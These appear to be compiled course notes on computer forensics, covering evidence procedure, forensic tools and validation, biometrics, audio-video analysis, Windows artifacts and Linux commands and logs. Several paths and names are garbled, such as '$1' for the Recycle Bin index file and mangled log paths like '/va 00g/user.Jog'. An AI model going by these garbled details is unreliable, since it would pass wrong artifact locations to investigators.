Computer Forensics and Investigations: Understanding Computer Forensics

INTRODUCTION
Computer Forensics is a scientific method of investigation and analysis in order to gather evidence
from digital devices or computer networks and components which is suitable for presentation in a court
of law or legal body. It involves performing a structured investigation while maintaining a documented
chain of evidence to find out exactly what happened on a computer and who was responsible for it.
TYPES
 Disk Forensics: It deals with extracting raw data from the primary or secondary storage of the
device by searching active, modified, or deleted files.
 Network Forensics: It is a sub-branch of Computer Forensics that involves monitoring and
analyzing the computer network traffic.
 Database Forensics: It deals with the study and examination of databases and their related
metadata.
 Malware Forensics: It deals with the identification of suspicious code and studying viruses,
worms, etc.
 Email Forensics: It deals with emails and their recovery and analysis, including deleted emails,
calendars, and contacts.
 Memory Forensics: Deals with collecting data from system memory (system registers, cache,
RAM) in raw form and then analyzing it for further investigation.
 Mobile Phone Forensics: It mainly deals with the examination and analysis of phones and
smartphones and helps to retrieve contacts, call logs, incoming, and outgoing SMS, etc., and other data
present in it.

CHARACTERISTICS
 Identification: Identifying what evidence is present, where it is stored, and how it is stored (in
which format). Electronic devices can be personal computers, Mobile phones, PDAs, etc.
 Preservation: Data is isolated, secured, and preserved. It includes prohibiting unauthorized
personnel from using the digital device so that digital evidence, mistakenly or purposely, is not
tampered with and making a copy of the original evidence.
 Analysis: Forensic lab personnel reconstruct fragments of data and draw conclusions based on
evidence.
 Documentation: A record of all the visible data is created. It helps in recreating and reviewing
the crime scene. All the findings from the investigations are documented.
 Presentation: All the documented findings are produced in a court of law for further
investigations.

PROCEDURE:
The procedure starts with identifying the devices used and collecting the preliminary evidence on the
crime scene. Then the court warrant is obtained for the seizure of the evidence which leads to the
seizure of the evidence. The evidence are then transported to the forensics lab for further
investigations and the procedure of transportation of the evidence from the crime scene to labs are
called chain of custody. The evidence are then copied for analysis and the original evidence is kept safe
because analysis are always done on the copied evidence and not the original evidence.
The analysis is then done on the copied evidence for suspicious activities and accordingly, the findings
are documented in a nontechnical tone. The documented findings are then presented in a court of law
for further investigations.
Some Tools used for Investigation:
Tools for Laptop or PC –
 COFEE – A suite of tools for Windows developed by Microsoft.
 The Coroner’s Toolkit – A suite of programs for Unix analysis.
 The Sleuth Kit – A library of tools for both Unix and Windows.

Tools for Memory :

 Volatility
 WindowsSCOPE
Tools for Mobile Device :
 MicroSystemation XRY/XACT
APPLICATIONS
 Intellectual Property theft
 Industrial espionage
 Employment disputes
 Fraud investigations
  Misuse of the Internet and email in the workplace
 Forgeries related matters
 Bankruptcy investigations
 Issues concerned the regulatory compliance
Advantages of Computer Forensics:
 To produce evidence in the court, which can lead to the punishment of the culprit.
 It helps the companies gather important information on their computer systems or networks
potentially being compromised.
 Efficiently tracks down cyber criminals from anywhere in the world.
 Helps to protect the organization’s money and valuable time.
 Allows to extract, process, and interpret the factual evidence, so it proves the cybercriminal
action’s in the court.
Disadvantages of Computer Forensics:
 Before the digital evidence is accepted into court it must be proved that it is not tampered with.
 Producing and keeping electronic records safe is expensive.
 Legal practitioners must have extensive computer knowledge.
 Need to produce authentic and convincing evidence.
 If the tool used for digital forensics is not according to specified standards, then in a court of
law, the evidence can be disapproved by justice.
 A lack of technical knowledge by the investigating officer might not offer the desired result.

Preparing for Computer Investigations

The field of computer forensics investigation is growing, especially as law enforcement and legal
entities realize just how valuable information technology (IT) professionals are when it comes to
investigative procedures. With the advent of cyber crime, tracking malicious online activity has
become crucial for protecting private citizens, as well as preserving online operations in public safety,
national security, government and law enforcement. Tracking digital activity allows investigators to
connect cyber communications and digitally-stored information to physical evidence of criminal
activity; computer forensics also allows investigators to uncover premeditated criminal intent and may
aid in the prevention of future cyber crimes. For those working in the field, there are five critical steps
in computer forensics, all of which contribute to a thorough and revealing investigation.

 Policy and Procedure Development

Whether related to malicious cyber activity, criminal conspiracy or the intent to commit a crime, digital
evidence can be delicate and highly sensitive. For this reason, it is critical to establish and follow strict
guidelines and procedures for activities related to computer forensic investigations. Such procedures
can include detailed instructions about when computer forensics investigators are authorized to recover
potential digital evidence, how to properly prepare systems for evidence retrieval, where to store any
retrieved evidence, and how to document these activities to help ensure the authenticity of the data.
Law enforcement agencies are becoming increasingly reliant on designated IT departments, which are
staffed by seasoned cyber security experts who determine proper investigative protocols and develop
rigorous training programs to ensure best practices are followed in a responsible manner. In addition to
establishing strict procedures for forensic processes, cybersecurity divisions must also set forth rules of
governance for all other digital activity within an organization. This is essential to protecting the data
infrastructure of law enforcement agencies as well as other organizations.
An integral part of the investigative policies and procedures for law enforcement organizations that
utilize computer forensic departments is the codification of a set of explicitly-stated actions regarding
what constitutes evidence, where to look for said evidence and how to handle it once it has been
retrieved. Prior to any digital investigation, proper steps must be taken to determine the details of the
case at hand, as well as to understand all permissible investigative actions in relation to the case; this
involves reading case briefs, understanding warrants, and authorizations and obtaining any permissions
needed prior to pursuing the case.

 Evidence Assessment
A key component of the investigative process involves the assessment of potential evidence in a cyber
crime. Central to the effective processing of evidence is a clear understanding of the details of the case
at hand and thus, the classification of cyber crime in question. For instance, if an agency seeks to prove
that an individual has committed crimes related to identity theft, computer forensics investigators use
sophisticated methods to sift through hard drives, email accounts, social networking sites, and other
digital archives to retrieve and assess any information that can serve as viable evidence of the crime.
This is, of course, true for other crimes, such as engaging in online criminal behavior like posting fake
products on eBay or Craigslist intended to lure victims into sharing credit card information. Prior to
conducting an investigation, the investigator must define the types of evidence sought (including
specific platforms and data formats) and have a clear understanding of how to preserve pertinent data.
The investigator must then determine the source and integrity of such data before entering it into
evidence.

 Evidence Acquisition
Perhaps the most critical facet of successful computer forensic investigation is a rigorous, detailed plan
for acquiring evidence. Extensive documentation is needed prior to, during, and after the acquisition
process; detailed information must be recorded and preserved, including all hardware and software
specifications, any systems used in the investigation process, and the systems being investigated. This
step is where policies related to preserving the integrity of potential evidence are most applicable.
General guidelines for preserving evidence include the physical removal of storage devices, using
controlled boot discs to retrieve sensitive data and ensure functionality, and taking appropriate steps to
copy and transfer evidence to the investigator’s system.
Acquiring evidence must be accomplished in a manner both deliberate and legal. Being able to
document and authenticate the chain of evidence is crucial when pursuing a court case, and this is
especially true for computer forensics given the complexity of most cybersecurity cases.

 Evidence Examination
In order to effectively investigate potential evidence, procedures must be in place for retrieving,
copying, and storing evidence within appropriate databases. Investigators typically examine data from
designated archives, using a variety of methods and approaches to analyze information; these could
include utilizing analysis software to search massive archives of data for specific keywords or file
types, as well as procedures for retrieving files that have been recently deleted. Data tagged with times
and dates is particularly useful to investigators, as are suspicious files or programs that have been
encrypted or intentionally hidden.
Analyzing file names is also useful, as it can help determine when and where specific data was created,
downloaded, or uploaded and can help investigators connect files on storage devices to online data
transfers (such as cloud-based storage, email, or other Internet communications). This can also work in
reverse order, as file names usually indicate the directory that houses them. Files located online or on
other systems often point to the specific server and computer from which they were uploaded,
providing investigators with clues as to where the system is located; matching online filenames to a
directory on a suspect’s hard drive is one way of verifying digital evidence. At this stage, computer
forensic investigators work in close collaboration with criminal investigators, lawyers, and other
qualified personnel to ensure a thorough understanding of the nuances of the case, permissible
investigative actions, and what types of information can serve as evidence.

 Documenting and Reporting

In addition to fully documenting information related to hardware and software specs, computer
forensic investigators must keep an accurate record of all activity related to the investigation, including
all methods used for testing system functionality and retrieving, copying, and storing data, as well as
all actions taken to acquire, examine and assess evidence. Not only does this demonstrate how the
integrity of user data has been preserved, but it also ensures proper policies and procedures have been
adhered to by all parties. As the purpose of the entire process is to acquire data that can be presented as
evidence in a court of law, an investigator’s failure to accurately document his or her process could
compromise the validity of that evidence and ultimately, the case itself.
For computer forensic investigators, all actions related to a particular case should be accounted for in a
digital format and saved in properly designated archives. This helps ensure the authenticity of any
findings by allowing these cybersecurity experts to show exactly when, where, and how evidence was
recovered. It also allows experts to confirm the validity of evidence by matching the investigator’s
digitally recorded documentation to dates and times when this data was accessed by potential suspects
via external sources.

CURRENT COMPUTER FORENSIC TOOLS

Types of Computer Forensics Tools

Computer forensics tools are divided into two major categories: hardware and software. Each category
has additional subcategories discussed in more depth later in this chapter. The following sections
outline basic features required and expected of most computer forensics tools.

Hardware Forensics Tools range from simple, single purpose components to complete computer
systems and servers. Single-purpose components can be devices, such as the ACARD AEC-7720WP
Ultra Wide SCSI-to-IDE Bridge, which is designed to write-block an IDE drive connected to a SCSI
cable.
Some examples of complete systems are Digital Intelligence F.R.E.D. systems, DIBS Advanced
Forensic Workstations, and Forensic Computers Forensic Examination Stations and portable units.
Software Forensics Tools Software forensics tools are grouped into command-line applications and
GUI applications. Some tools are specialized to perform one task, such as Safe Back, a command-line
disk acquisition tool from New Technologies, Inc. (NTI). Other tools are designed to perform many
different tasks. For example, Technology Pathways Pro- Discover, X-Ways Forensics, Guidance
Software En Case, and Access Data FTK are GUI tools designed to perform most computer forensics
acquisition and analysis functions.
Software forensics tools are commonly used to copy data from a suspect’s drive to an image file. Many
GUI acquisition tools can read all structures in an image file as though the image were the original
drive. Many analysis tools, such as ProDiscover, En Case, FTK, X-Ways Forensics, ILook, and others,
have the capability to analyze image files. In Chapter 4, you learned how some of these tools are used
to acquire data from suspects’ drives.
Tasks Performed by Computer Forensics Tools
All computer forensics tools, both hardware and software, perform specific functions. These functions
are grouped into five major categories, each with sub functions for further refining data analysis and
recovery:
 • Acquisition
• Validation and discrimination
• Extraction
• Reconstruction
• Reporting

In the following sections, you learn how these five functions and associated sub functions apply to
computing investigations.
Acquisition, the first task in computer forensics investigations, is making a copy of the original drive.
As described in Chapter 4, this procedure preserves the original drive to make sure it doesn’t become
corrupt and damage the digital evidence. Sub functions in the acquisition category include the
following:
• Physical data copy
• Logical data copy
• Data acquisition format
• Command-line acquisition
• GUI acquisition
• Remote acquisition
• Verification

Some computer forensics software suites, such as Access Data FTK and En Case, provide separate
tools for acquiring an image. However, some investigators opt to use hardware devices, such as the
Logic be Talon, VOOM Hard Copy 3, or Image MASSter Solo III Forensic unit from Intelligent
Computer Solutions, Inc., for acquiring an image. These hardware devices have their own built-in
software for data acquisition. No other device or program is needed to make a duplicate drive;
however, you still need forensics software to analyze the data.

Evaluating Computer Forensics Tools

Validation and Discrimination
Two issues in dealing with computer evidence are critical. First is ensuring the integrity of data being
copied—the validation process. Second is the discrimination of data, which involves sorting and
searching through all investigation data. The process of validating data is what allows discrimination
of data. Many forensics software vendors offer three methods for discriminating data values. These are
the sub functions of the validation and discrimination function:
• Hashing
• Filtering
• Analyzing file headers

Validating data is done by obtaining hash values. As a standard feature, most forensics tools and many
 disk editors have one or more types of data hashing. How data hashing is used depends on the
investigation, but using a hashing algorithm on the entire suspect drive and all its files is a good idea.
This method produces a unique hexadecimal value for data, used to make sure the original data hasn’t
changed.
This unique value has other potential uses. For example, in the corporate environment, you could
create a known good hash value list of a fresh installation of an OS, all applications, and all known
good images and documents (spreadsheets, text files, and so on). With this information, an investigator
could ignore all files on this known good list and focus on other files on the disk that aren’t on this
list. This process is known as filtering. Filtering can also be used to find data for evidence in criminal
investigations or to build a case for terminating an employee.
The primary purpose of data discrimination is to remove good data from suspicious data. Good data
consists of known files, such as OS files and common programs (Microsoft Word, for example).
Several computer forensics programs can integrate known good file hash sets, such as the ones from
the NSRL, and compare them to file hashes from a suspect drive to see whether they match. With this
process, you can eliminate large amounts of data quickly so that you can focus your evidence analysis.
You can also begin building your own hash sets.
Another feature to consider for hashing functions is hashing and comparing sectors of data. This
feature is useful for identifying fragments of data in slack and free disk space that might be partially
overwritten.
An additional method of discriminating data is analyzing and verifying header values for known file
types. Similar to the hash values of known files, many computer forensics pro- grams include a list of
common header values. With this information, you can see whether a file extension is incorrect for
the file type. Renaming file extensions is a common way to try to hide data, and you could miss
pertinent data if you don’t check file headers.

4.1.2 Extraction
The extraction function is the recovery task in a computing investigation and is the most challenging of
all tasks to master.
Recovering data is the first step in analyzing an investigation’s data. The following sub functions of
extraction are used in investigations:
• Data viewing
• Keyword searching
• Decompressing
• Carving
• Decrypting
• Bookmarking

Many computer forensics tools include a data-viewing mechanism for digital evidence. How data is
viewed depends on the tool. Tools such as ProDiscover, X-Ways Forensics, FTK, EnCase, SMART,
ILook, and others offer several ways to view data, including logical drive structures, such as folders
and files. These tools also display allocated file data and unallocated disk areas with special file and
disk viewers. Being able to view this data in its normal form makes analyzing and collecting clues for
the investigation easier
.4.2 Computer Forensics Software Tools
Whether you use a suite of tools or a task-specific tool, you have the option of selecting one that
enables you to analyze digital evidence through the command line or in a GUI. The following sections
explore some options for command-line and GUI tools in both Windows and UNIX/Linux.
Command-Line Forensics Tools
Computers used several OSs before MS-DOS dominated the market. During this time, computer
forensics wasn’t a major concern. After people started using PCs, however, they figured out how to
use them for illegal and destructive purposes and to commit crimes and civil infractions.
 Software developers began releasing computer forensics tools to help private- and public-sector
investigators examine PCs. The first tools that analyzed and extracted data from floppy disks and hard
disks were MS-DOS tools for IBM PC file systems.
One of the first MS-DOS tools used for computer investigations was Norton Disk Edit. This tool used
manual processes that required investigators to spend considerable time on a typical 500 MB drive.
Eventually, programs designed for computer forensics were developed for DOS, Windows, Apple,
NetWare, and UNIX systems. Some of these early programs could extract data from slack and free disk
space; others were capable only of retrieving deleted files. Current programs are more robust and can
search for specific words or characters, import a keyword list to search, calculate hash values, recover
deleted items, conduct physical and logical analyses, and more.
One advantage of using command-line tools for an investigation is that they require few sys- tem
resources because they’re designed to run in minimal configurations. In fact, most tools fit on bootable
media (floppy disk, USB drive, CD, or DVD). Conducting an initial inquiry or a complete
investigation with bootable media can save time and effort. Most tools also produce a text report small
enough to fit on a floppy disk.
Forensic Workstations
Many computer vendors offer a wide range of forensic workstations that you can tailor to meet your
investigation needs. The more diverse your investigation environment, the more options you need.
In general, forensic workstations can be divided into the following categories:
• Stationary workstation—A tower with several bays and many peripheral devices
• Portable workstation—A laptop computer with a built-in LCD monitor and almost as many bays
and peripherals as a stationary workstation
• Lightweight workstation—usually a laptop computer built into a carrying case with a small
selection of peripheral options
When considering options to add to a basic workstation, keep in mind that PCs have limitations on
how many peripherals they can handle. The more peripherals you add, the more potential problems you
might have, especially if you’re using an older version of Windows. You must learn to balance what
you actually need with what your system can handle.
4.3 Validating and Testing Forensics Software
Now that you have selected some tools to use, you need to make sure the evidence you recover
and analyze can be admitted in court. To do this, you must test and validate your software. The
following sections discuss validation tools available at the time of this writing and how to
develop your own validation protocols.
Using National Institute of Standards and Technology (NIST) Tools
The National Institute of Standards and Technology publishes articles, provides tools, and creates
procedures for testing and validating computer forensics software. Software should be verified to
improve evidence admissibility in judicial proceedings. NIST sponsors the Computer Forensics
Tool Testing (CFTT) project to manage research on computer forensics tools.
• Establish categories for computer forensics tools—Group computer forensics software according
to categories, such as forensics tools designed to retrieve and trace e-mail.
• Identify computer forensics category requirements—For each category, describe the technical
features or functions a forensics tool must have.
• Develop test assertions—Based on the requirements, create tests that prove or diSprove the tool’s
capability to meet the requirements.
• Identify test cases—Find or create types of cases to investigate with the forensics tool, and
identify information to retrieve from a sample drive or other media. For example, use the image
of a closed case file created with a trusted forensics tool to test a new tool in the same category
and see whether it produces the same results.
• Establish a test method—Considering the tool’s purpose and design, specify how to test it.
• Report test results—Describe the test results in a report that complies with ISO 17025, which
requires accurate, clear, unambiguous, and objective test reports.
Another standards document, ISO 5725, demands accuracy for all aspects of the testing pro- cess, so
results must be repeatable and reproducible. ―Repeatable results ‖ means that if you work in the same lab
on the same machine, you generate the same results. ―Reproducible results ‖ means that if you’re in a
different lab working on a different machine, the tool still retrieves the same information

Facial recognition
A facial recognition system analyses the shape and position of different parts of the face to
determine a match. Surface features, such as the skin, are also sometimes taken into account.
Facial recognition for biometric security purposes is an offshoot of face detection technology,
which is used to identify faces in complex images in which a number of faces may be present.
This technology has developed rapidly in recent years and is therefore an excellent candidate as
biometric security if a system is needed for remote recognition. Another plus is that the
technology allows ‘negative identification’, or the exclusion of faces, making it a good deal
easier to scan a crowd for suspicious individuals.
However, facial recognition also has a number of significant drawbacks. For example, the
technology focuses mainly on the face itself, i.e. from the hairline down. As a result, a person
usually has to be looking straight at the camera to make recognition possible. And even though
the technology is still developing at a rapid pace, the level of security it currently offers does not
yet rival that of iris scanning or vein pattern recognition.

Iris recognition

When an iris scan is performed a scanner reads out the unique characteristics of an iris, which are
then converted into an encrypted (bar)code. Iris scanning is known to be an excellent biometric
security technique, especially if it is performed using infrared light.
However, one problem frequently encountered when the technology is introduced is resistance
from users. Quite a few people find having their eyes scanned a rather unpleasant experience.
You also have to adopt a certain position so the scanner can read your iris, which can cause
discomfort. Hygiene is another frequently cited drawback, as many systems require users to
place their chin on a chin rest that has been used by countless people before them.
Lastly, it is important to bear in mind that although iris scanning offers a high level of biometric
security, this may come at the expense of speed. Incidentally, systems have recently been
developed that can read a person’s iris from a (relatively short) distance.

Fingerprint recognition

An identification system based on fingerprint recognition looks for specific characteristics in the
line pattern on the surface of the finger. The bifurcations, ridge endings and islands that make up
this line pattern are stored in the form of an image.
The disadvantage of capturing an image of an external characteristic is that this image can be
replicated – even if it is stored in encoded form. An image is still an image, after all, and can
therefore be compared. In principle, you can then generate the same code. Fingerprints can
already be spoofed* using relatively accessible technology. Another, by no means insignificant,
point to consider is that a finger presented for recognition does not necessarily still need to be
attached to a body...
In addition, some line patterns are so similar that in practice this can result in a high false
acceptance rate.** Fingerprints can also wear away as you get older, if you do a lot of DIY or a
particular kind of work, for example. As a result, some people may find that their fingerprints
cannot be recognised (false rejection**) or even recorded. There is even
a hereditary disorder that results in people being born without fingerprints!
On the other hand, fingerprint identification is already familiar to much of the public and is
therefore accepted by a large number of users to use as biometric security. The technology is also
relatively cheap and easy to use. It should be noted, however, that quality can vary significantly
from one fingerprint recognition system to another, with considerable divergence between
systems in terms of false acceptance and false rejection rates.
* Biometric spoofing refers to the presentation of a falsified biometric characteristic with the
aim of being identified as another person. This may involve using a replicated fingerprint or a
contact lens with a falsified iris pattern. The risk of spoofing mainly applies to forms of
biometric security based on superficial external characteristics.

Audio-Video Analysis
Audio and video are the digitalized source of evidence that can be found at the scene of a crime
or with the victim or the accused in the form of audio-video from mobile device or any CCTV
footage. Such types of digital evidences are of utmost importance in civil or criminal cases.
Therefore, audio and video forensics is the leading branch of forensic science in the digitalized
era.
In forensic science, audio-video forensics forms three basic principles such as acquisition,
analysis, and evaluation of audio and video recordings which are admissible in the court of law.
One of the main tasks of audio and video forensic experts is to establish the authenticity and
credibility of digital evidence. The forensic examination of audio and video is done in order to
enhance the recordings to improve speech intelligibility and audibility of the sounds.
How the analysis of Audio-Video evidences are performed?
One of the primary tasks of forensic digital investigators to assist the crime scene investigators in
order to find the conclusive proof via a number of scientific tools and equipments. After
following the standardized procedure of crime scene investigation, at the time of evidence
collection, the investigators must thoroughly search the suspected area and recover the evidence
carefully. Such digital evidences must be protected from physical harm, environment, and heat.
Once the evidence is collected in a safe and secure manner, the proper documentation of
evidence must be done in the form of notes or photography/videography. The documentation
must include in which condition the evidence was found from the crime scene along with the
name of the evidence collector, date, and time of evidence collection. All examination protocols
are carefully examined and constructed for enhancement techniques that must be employed to
the recovered evidence.
A variety of enhancement techniques can be employed on audio and video analysis. The
techniques which are employed for video enhancement are as follows:
a. Sharpening: This step makes the edges of the images more clear and distinct.
b. Video Stabilization: This step reduces the amount of movement in the video, and also
produces the fine playback.
c. Masking: This step covers the face or areas of the video that may protect the victim, witness
or any law enforcement official.
d. Interlacing: In an analog system, the interlaced scanning is used to record the images or at the
same time, this process is used to de-interlace which may be used to retrieve the information.
e. Demultiplexing: There is a device in CCTV named multiplexer, which is used to combine
multiple series of video signals into a single signal.
The techniques which are employed for audio enhancement are as follows:
a. Frequency Equalization: There is a need for highly precise equalizers that are used to cut
specific bands of frequencies. The frequency band which often contains more speech content is
 amplified or isolated. Large noise or interruptions can be analyzed by spectrum analyzer and the
corresponding frequencies are reduced in order to reduce noise level.
b. Compression: Faint or low sound can be increased by compressing or leveling the signal so
that the loud range can be minimized.
Such evidences are critically analyzed and listened carefully and proper documentation must be
done. After standard forensic protocol, the forensic report is prepared by a forensic cyber expert
and presented in the court of law.
The forensic audio-video report must include the following details:
1. Results which were obtained from the analysis of audio-video files
2. Waveform charts of audio recordings and comparison waveform with formants
3. Identification of the format and type of recording
4. Type of processing which was used to analyze
5. Date and Time of analysis of audio files.
6. Description of the evidence in the type of circumstances and conditions in which it was
collected
7. Description of the enhanced audio-video and type of software that was used.
8. Qualifications of the Audio Video Analyst.
9. Authorized signatory with name and stamp
10. Hash Values of the Audio Video Files
Software for Audio Analysis
 WavePad Master
 Sonic Visualizer
 Praat
 Gold Wave
 Audacity
 Speech Analyzer

Windows System Forensics

When doing Windows Forensic Analysis, it can be quite overwhelming to see a large amount of
data that one needs to collect, assuming you know what you are looking for. In case you don’t
know what are you looking for, the entire process becomes twice as hard.
What is Windows Forensic Analysis?
Windows Forensic Analysis focuses on 2 things:
1. In-depth analysis of Windows Operating System.
2. Analysis of Windows System Artifacts.
Windows artifacts are the objects which hold information about the activities that are performed
by the Windows user. The type of information and the location of the artifact varies from one
operating system to another. Windows artifacts contain sensitive information that is collected and
analyzed at the time of forensic analysis.
What are Forensic Artifacts?
Forensic artifacts are the forensic objects that have some forensic value. Any object that contains
some data or evidence of something that has occurred like logs, register, hives, and many more.
In this section, we will be going through some of the forensic artifacts that a forensic investigator
look for while performing a Forensic analysis in Windows.
1. Recycle Bin: The windows recycle bin contains some great artifacts like:
 $1 file containing the metadata. You can find this file under the path C:\
$Recycle.Bin\SID*\$Ixxxxxx
 $R file containing the contents of the deleted files. This file can be located under
the path C:\$Recycle.Bin\SID*\$Rxxxxxx
 $1 file can be parsed using a tool $1 Parse.
2. Browsers: Web browsers contain a lot of information like:
 Cookies.
<="" li="" style="box-sizing: border-box;">
 Cached website data.
 Downloaded files.
3. Windows Error Reporting: This features enables user to inform Microsoft about application
faults, kernel faults, unresponsive application, and other application specific problems. This
feature provides us with various artifacts like:
 Program Execution, if a malicious program crashes during program execution.
 You can locate these artifacts at the following locations:
 C:\ProgramData\Microsoft\Windows\WER\ReportArchive
 C:\Users\XXX\AppData\Local\Microsoft\Windows\WER\ReportArchive
 C:\ProgramData\Microsoft\Windows\WER\ReportQueue
 C:\Users\XXX\AppData\Local\Microsoft\Windows\WER\ReportQueue
4. Remote Desktop Protocol Cache: When using the “mstc” client that is provided by the
Windows, RDP can be used to move laterally through the network. Cache files are created
containing the sections of the screen of the machine to which we are connected to and that is
rarely changing. These cache files can be located in the directory:
C:\Users\XXX\AppData\Local\Microsoft\Terminal Server Client\Cache
Tools like BMC-Tools can be used to extract images stored in these cache files.
5. LNK Files: .lnk files are the windows shortcut files. LNK files link or point to other files or
executables for ease of access. You can find following information in these files:
 The original path of the target file.
 Timestamp of both the target files and the .lnk files.
 File Attributes like System, Hidden, etc.
 Details about the disk.
 Remote or local execution.
 MAC address of the machines.
You can use tools like Windows LNK Parsing Library or LECmd to parse the contents of these
files.
6. Jump Lists: They contain information about the recently accessed applications and files. This
feature was introduced with Windows 7. Two types of Jump Lists can be created in Windows:
 AUTOMATICDESTINATIONS-MS: These jump lists are created automatically when
a user opens a file or an application. They are located under the path:
C:\Users\xxx\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations
 CUSTOMDESTINATIONS-MS: These jump lists are custom made and are created
when a user pins a file or an application. They are located under the
directory C:\Users\xxx\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations
You can use tools like JumpList Explorer, JLECmd, or Windows JumpList Parser to parse
Jump lists.
7. Prefetch Files: These files contain a wealth of information like:
 Application Name.
 Application path.
 Last execution timestamp.
 Creation timestamp.
These files can be located under the directory: C:\Windows\Prefetch\. You can use tools
like Windows Prefetch Parser, WinPrefetchView, or PECmd.
Top Open-Source Tools for Windows Forensic Analysis
In this section, we will be discussing some of the open-source tools that are available for
conducting Forensic Analysis in the Windows Operating System.
1. Magnet Encrypted Disk Detector: This tool is used to check the encrypted physical drives.
This tool supports PGP, Safe boot encrypted volumes, Bitlocker, etc. You can download it
from here.
2. Magnet RAM Capture: This tool is used to analyze the physical memory of the system. You
can download it from here.
3. Wireshark: This is a network analyzer tool and a capture tool that is used to see what traffic is
going in your network. You can download it from here.
4. RAM Capture: As the name suggests, this is a free tool that is used to extract the entire
contents of the volatile memory i.e. RAM. You can download it from here.
5. NMAP: This is the most popular tool that is used to find open ports on the target machine.
Using this tool you can find the vulnerability of any target to hack. You can download it
from here.
6. Network Miner: This tool is used as a passive network sniffer to capture or to detect the
operating systems ports, sessions, hostnames, etc. You can download it from here.
7. Autopsy: This is the GUI based tool, that is used to analyze hard disks and smartphones. You
can download it from here.
8. Forensic Investigator: This is a Splunk toolkit which is used in HEX conversion, Base64
conversion, metascan lookups, and many more other features that are essential in forensic
analysis. You can download it from here.
9. HashMyFiles: This tool is used to calculate the SHA1 and MD5 hashes. It works on all the
latest websites. You can download it from here.
10. Crowd Response: This tool is used to gather the system information for incident response.
You can download it from here.
11. ExifTool: This tool is used to read, write, and edit meta information from a number of files.
You can download it from here.
12. FAW (Forensic Acquisition of Websites): This tool is used to acquire web pages image,
HTML, source code of the web page. This tool can be integrated with Wireshark. You can
download it from here.
There is such a large variety of forensic tools available in the market. Some are free and open-
source and some tools charge annual or monthly fees. You just need to identify your
requirements and choose a tool that best suits your requirements.

Linux Forensics
Linux forensics refers to performing forensic investigation on a Linux operated device. To do
so, the investigators should have a good understanding on the techniques required to conduct live
analysis; to collect volatile and non-volatile data, along with knowledge of various shell
commands and the information they can retrieve. The investigators should also be aware of the
Linux log files, their storage and location in the directory, as they are the most important sources
of information to trace down the attacker. This module will walk you through the various shell
commands, methods to collect volatile data, the different log files and the information they
provide.
Shall Commands
Investigators use the shell commands in Linux for collecting information from the system. Some
of the frequently used commands include:
1. dmesg
The command dmesg is the short for display message or ‘Driver Message’. The command
displays the kernel ring buffers, which contains the information about the drivers loaded into
kernel during boot process and error messages produced at the time of loading the drivers into
kernel. These messages are helpful in resolving the restoring the device’s driver issues.
Syntax: dmesg options
dmesg | grep –i ethO (Displays hardware information of the Ethernet port eth0)
2. fsck
The command fsck, is meant for File System Consistency Check. It is a tool to check the
consistency of Linux file system and repair.
Syntax: fsck —A (Checks all configured filesystems)
3. Stat
Displays file or file system status.
Syntax: stat [OPTION]… FILE…
4. history
The command history checks and lists the Bash shell commands used. This command helps the
users for auditing purposes.
Syntax: history n (Lists the last n commands)
5. mount
The command mount causes mounting of a file system or a device to the directory structure,
making it accessible by the system.
Syntax: mount -t type device dir (Requests kernel to attach the file system found on device of
type type at the directory dir)
Linux Log Files
Log files are records of all the activities performed over an operating system. Linux log files
store information about the system’s kernel and the services running in the system. In Linux OS,
different log files hold different information, which helps the investigators to analyze various
issues during a security incident.
Investigators should learn and understand about the contents of various log files, which will help
them during security incidents and help them understand the locations they might have to look
for finding potential evidences.
Below mentioned are some locations for Linux log files, which can help the investigators to find
out the required data and resolve the issues. Additional log locations include:
/var./log/messages: Global system messages
/var/log/dmesg: Kernel ring buffer information
/var/log/cron: Information about the cron job in this file
/va 00g/user.Jog: All user level logs
/vra /log/lastlog: Recent login information
/var/log/boot.log: Information logged on system boots
Collecting Volatile Data (cont’d)
1. .bash_history
The .bash history file stores the command history. These file helps the investigator to analyze the
commands used in the terminal by the malicious user.
2. /proc
The /proc/ directory is also known as proc file system. The directory comprises of the order of
special files that represent the current state of a kernel. Investigators can find the information of
the systems hardware and the processes running them. The proc file system acts as interface for
the internal data structures within the kernel.
3. Ps
The command ps is the short notation for “process status”. The command is used to view the list
of processes running in the system. It provides a snapshot of the current processes along with
detailed information of user Id, CPU usage, memory usage, command name, etc. Investigators
can check for the tree to determine any suspicious processes and dependencies.
Investigators need detailed information and evidences to solve the case with ease. The above
commands provide ample information about the non-volatile data on a Linux machine. The
investigator can decide which information needs to be extracted from the configuration files, or
which information about (or from) files needs to be collected for additional analysis because in
some cases the attacker could be actively logged into the system during the investigation. In such
cases, the investigator may decide to track the attacker.
The investigator must also preserve certain important information from being modified or
deleted. This includes safeguarding the non-volatile information of the system, including firewall
logs, swap files, antivirus logs, slack space, and unallocated drive space. To preserve the integrity
of the evidence, a chain of custody is prepared and the collected evidence is documented for
further investigation.
4. Swap Space
Linux operating system allocates certain amount of storage space on a hard disk called Swap
Space. OS uses as the virtual memory extension of a computer’s real memory (RAM). The OS
splits physical RAM into bits/chunks of memory called pages. Having a swap space allows your
computer’s operating system to pretend that you have more RAM than you actually do. The least
recently used pages in RAM can be “swapped out” to your hard disk until they are needed later,
so that new files can be “swapped ink’ to RAM. In larger operating systems (such as IBM’s
OS/390) the swapping is called paging.
One advantage of a swap space is, the ability to organize itself as a single contiguous space so
that the system can operate it using fewer I/O operations to read or write a complete file. In
general, Windows and UNIX-based operating systems provide a default swap space of a certain
size that the user or a system administrator can change.